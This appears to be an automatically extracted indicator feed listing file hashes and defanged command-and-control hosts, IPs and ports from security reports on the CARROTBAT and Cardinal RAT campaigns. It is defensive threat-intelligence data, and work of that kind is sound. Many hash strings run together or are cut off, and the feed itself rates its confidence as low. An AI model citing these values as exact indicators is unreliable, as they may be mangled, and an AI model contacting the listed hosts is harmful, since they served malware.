sha256aef92be267a05cbff83aec0f23d33dfe0c4cdc71f9a424f5a2e59ba62b7091dea6d25c SHA1 f459f9cfbd10b136cafb19cbc233a4c8342ad984 SHA256 aef92be267a05cbff83aec0f23d33dfe0c4cdc71f9a424f5a2e59ba62b7091de File Type PE32 executable (GUI) Intel 80386, for MS WindowsThe Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
sha256ba100e7bac8672b9fd73f2d0b7f419378f81ffb56830f6e27079cb4a064ba39a738fa80b1e127f97c0afdb6c2e1c15115f183480777977b8422561980dd ba100e7bac8672b9fd73f2d0b7f419378f81ffb56830f6e27079cb4a064ba39a e527ade24beacb2ef940210ba9acb21073e2b0dadcd92f1b8f6acd72b52The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
sha256ba78f0a6ce53682942e97b5ad7ec76a2383468a8b6cd5771209812b6410f10cbef3aaadac5b40a37ec0b3686c0c2976d65c978a2b685fefe50662876ded ba78f0a6ce53682942e97b5ad7ec76a2383468a8b6cd5771209812b6410f10cb dca9bd1c2d068fc9c84a754e4dcf703629fbe2aa33a089cb50a7e33e073The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
sha256cf31dac47680ff1375ddaa3720892ed3a7a70d1872ee46e6366e6f93123f58d23ed7fc664df4865840f39bfeaf9daeb3b88dcd921a90366635d59bc15f2 cf31dac47680ff1375ddaa3720892ed3a7a70d1872ee46e6366e6f93123f58d2 fe186d04ca6afec2578386b971b5ecb189d8381be055790a9e6f78b3f23The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
sha256cfe436c1f0ce5eb7ac61b32cd073cc4e4b21d5016ceef77575bef2c2783c2d6243b4f4 SHA1 e66e416f300c7efb90c383a7630c9cfe901ff9fd SHA256 cfe436c1f0ce5eb7ac61b32cd073cc4e4b21d5016ceef77575bef2c2783c2d62 File Type Microsoft Cabinet archive data, 181248 bytes, 3 fThe Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
sha256d34aabf20ccd93df9d43838cea41a7e243009a3ef055966cb9dea75d84b2724dunicate with 61.14.210[.]72 on port 7117. CARROTBAT Samples d34aabf20ccd93df9d43838cea41a7e243009a3ef055966cb9dea75d84b2724d 8b6b4a0e0945c6daf3ebc8870e3bd37e54751f95162232d85dc0a0cc8beThe Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
sha256d965627a12063172f12d5375c449c3eef505fde1ce4f5566e27ef2882002b5d017efc19804de64317cbc90efd63e814b5bb168c300cfec4cfdedf376f4f d965627a12063172f12d5375c449c3eef505fde1ce4f5566e27ef2882002b5d0 7d443434c302431734caf1d034c054ad80493c4c703d5aaeafa4a931a49The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
sha256da94a331424bc1074512f12d7d98dc5d8c5028821dfcbe83f67f49743ae70652f2bebf30592dd9bba4fc3befced4c727b85a036550fc3ac70d1965f8de5 da94a331424bc1074512f12d7d98dc5d8c5028821dfcbe83f67f49743ae70652 2efdd25a8a8f21c661aab2d4110cd7f89cf343ec6a8674ff20a37a17507The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
sha256dca9bd1c2d068fc9c84a754e4dcf703629fbe2aa33a089cb50a7e33e073f5cea0a6ce53682942e97b5ad7ec76a2383468a8b6cd5771209812b6410f10cb dca9bd1c2d068fc9c84a754e4dcf703629fbe2aa33a089cb50a7e33e073f5cea 7d8376057a937573c099e3afe2d8e4b8ec8cb17e46583a2cab1a4ac4b8bThe Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
sha256e218b19252f242a8f10990ddb749f34430d3d7697cbfb6808542f609d2cbf828fa6acc942d186a31dc62be0de5e07d6201bdff5d7b2f1a7521d1d909847 e218b19252f242a8f10990ddb749f34430d3d7697cbfb6808542f609d2cbf828 824f79a8ee7d8a23a0371fab83de44db6014f4d9bdea90b47620064e232The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
sha256e3b45b2e5d3e37f8774ae22a21738ae345e44c07ff58f1ab7178a3a43590fddd66c2385dae0bb6dda186f004800eb6ceaed132aec2ea42b1ddcf12a5c4e e3b45b2e5d3e37f8774ae22a21738ae345e44c07ff58f1ab7178a3a43590fddd a0f53abde0d15497776e975842e7df350d155b8e63d872a914581314aaaThe Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
sha256e527ade24beacb2ef940210ba9acb21073e2b0dadcd92f1b8f6acd72b523c828e7bac8672b9fd73f2d0b7f419378f81ffb56830f6e27079cb4a064ba39a e527ade24beacb2ef940210ba9acb21073e2b0dadcd92f1b8f6acd72b523c828 9fa69bdc731015aa7bdd86cd311443e6f829fa27a9ba0adcd49fa773fb5The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
sha256e8381f037a8f70d8fc3ee11a7bec98d6406a289e1372c8ce21cf00e55487dafccc0d7872fb756e2dc902f1a22d14885bf283c8e183a81b2927b363f5084 e8381f037a8f70d8fc3ee11a7bec98d6406a289e1372c8ce21cf00e55487dafc 1c8351ff968f16ee904031f6fba8628af5ca0db01b9d775137076ead541The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
sha256f27d640283372eb805df794ae700c25f789d77165bb98b7174ee03a617a566d4d8b9289bd92c9b899515ff0c12966b96dd3e4b69a00264da50248254bb7 f27d640283372eb805df794ae700c25f789d77165bb98b7174ee03a617a566d4 0bb099849ed7076177aa8678de65393ef0d66e026ad5ab6805c1c47222fThe Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
sha256f4c00cc0d7872fb756e2dc902f1a22d14885bf283c8e183a81b2927b363f50849849ed7076177aa8678de65393ef0d66e026ad5ab6805c1c47222f26358 f4c00cc0d7872fb756e2dc902f1a22d14885bf283c8e183a81b2927b363f5084 e8381f037a8f70d8fc3ee11a7bec98d6406a289e1372c8ce21cf00e5548The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
sha256fa712f2bebf30592dd9bba4fc3befced4c727b85a036550fc3ac70d1965f8de5b104bed6c8e85fff87b1bf06fde5b4a57fe7240b562a51727a37034f659 fa712f2bebf30592dd9bba4fc3befced4c727b85a036550fc3ac70d1965f8de5 da94a331424bc1074512f12d7d98dc5d8c5028821dfcbe83f67f49743aeThe Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
sha256fceceb104bed6c8e85fff87b1bf06fde5b4a57fe7240b562a51727a37034f6593a20fd66467e87290f5845a5c7d6aa8d460426abd30d4a6adcffca06b8b fceceb104bed6c8e85fff87b1bf06fde5b4a57fe7240b562a51727a37034f659 fa712f2bebf30592dd9bba4fc3befced4c727b85a036550fc3ac70d1965The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
sha256fe186d04ca6afec2578386b971b5ecb189d8381be055790a9e6f78b3f23c9958ac47680ff1375ddaa3720892ed3a7a70d1872ee46e6366e6f93123f58d2 fe186d04ca6afec2578386b971b5ecb189d8381be055790a9e6f78b3f23c9958 Infrastructure https://881.000webhostapp[.]com/1.txt http:/The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
sha256fe8d65287dd40ca0a1fadddc4268268b4a77cdb04a490c1a73aa15b6e4f1dd63067f08b0b8f9c58a35d409fdd6481337bdc2d5f2152f8e8f304f8a472b6 fe8d65287dd40ca0a1fadddc4268268b4a77cdb04a490c1a73aa15b6e4f1dd63 a23f95b4a602bdaef1b58e97843e2f38218554eb57397210a1aaa685088The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
sha256ffd1e66c2385dae0bb6dda186f004800eb6ceaed132aec2ea42b1ddcf12a5c4ebdc731015aa7bdd86cd311443e6f829fa27a9ba0adcd49fa773fb5e7fa9 ffd1e66c2385dae0bb6dda186f004800eb6ceaed132aec2ea42b1ddcf12a5c4e e3b45b2e5d3e37f8774ae22a21738ae345e44c07ff58f1ab7178a3a4359The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
domainaffiliatecollective.club} Campaign Identifier: '\xf1\xaf\x02i.]\xa4\xe0' C2 Server: affiliatecollective[.]club C2 Port: 443 Hash Value: 0304674e9876530dfbea5a9b4fec7b98Cardinal RAT Sins Again, Targets Israeli Fin
Palo Alto Unit 42
· Aug 17, 2026
md50304674e9876530dfbea5a9b4fec7b98Server: affiliatecollective[.]club C2 Port: 443 Hash Value: 0304674e9876530dfbea5a9b4fec7b98 Additional C2 Servers: 0 GUID: '\xd6\x04hr\x9a\xedLN\xae\xeCardinal RAT Sins Again, Targets Israeli Fin
Palo Alto Unit 42
· Aug 17, 2026
sha2560097dd7676b810bd0c1c70d8c86604c830e1e8e88f6a13c3869747faba381076bbfcd2b343523ed79476f9516cc7d2b041c43841e5e735db4f22ae970c3 0097dd7676b810bd0c1c70d8c86604c830e1e8e88f6a13c3869747faba381076 08ce077e8d54db08ede1095d03286146d04e8cbce74ec91a9fc7b9d0a99Cardinal RAT Sins Again, Targets Israeli Fin
Palo Alto Unit 42
· Aug 17, 2026

Extraction is regex-based (SHA-256/SHA-1/MD5, public IPv4, defanged hxxp/[.] indicators, and bare domains/emails only from malware, actor, exploit, phishing, ransomware and breach articles with a nearby indicator context word). Treat confidence as low until you verify against the source article.